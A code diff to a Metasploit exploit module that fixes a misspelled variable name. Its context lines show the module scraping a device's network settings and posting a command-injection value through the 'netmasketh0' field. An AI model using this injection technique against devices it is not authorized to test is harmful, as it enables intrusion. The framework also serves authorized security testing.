@@ -209,7 +209,7 @@ class MetasploitModule < Msf::Exploit::Remote
     })
 
     if res and res.code == 200 and res.body =~ /Ethernet Interfaces/
-      adress_eth0 = (res.body =~ /<input type="text" value="(.*)" name="addresseth0" class="textInput" \/>/ ? $1 : "")
+      address_eth0 = (res.body =~ /<input type="text" value="(.*)" name="addresseth0" class="textInput" \/>/ ? $1 : "")
       @netmask_eth0 = (res.body =~ /<input type="text" value="(.*)" name="netmasketh0" class="textInput" \/>/ ? $1 : "")
       gateway = (res.body =~ /<input type="text" name="Gateway" value= "(.*)" class="textInput">/ ? $1 : "")
       dns_address = (res.body =~ /<input type="text" value="(.*)" name="dnsaddress0" class="textInput">/ ? $1 : "")
@@ -244,7 +244,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'cookie'    => "JSESSIONID=#{session}",
       'vars_post' =>
       {
-        "addresseth0" => adress_eth0 || rand_text_alpha(5 + rand(3)),
+        "addresseth0" => address_eth0 || rand_text_alpha(5 + rand(3)),
         "netmasketh0" => injection,
         "Gateway" => gateway || rand_text_alpha(5 + rand(3)),
         "dnsaddress0" => dns_address || rand_text_alpha(5 + rand(3)),
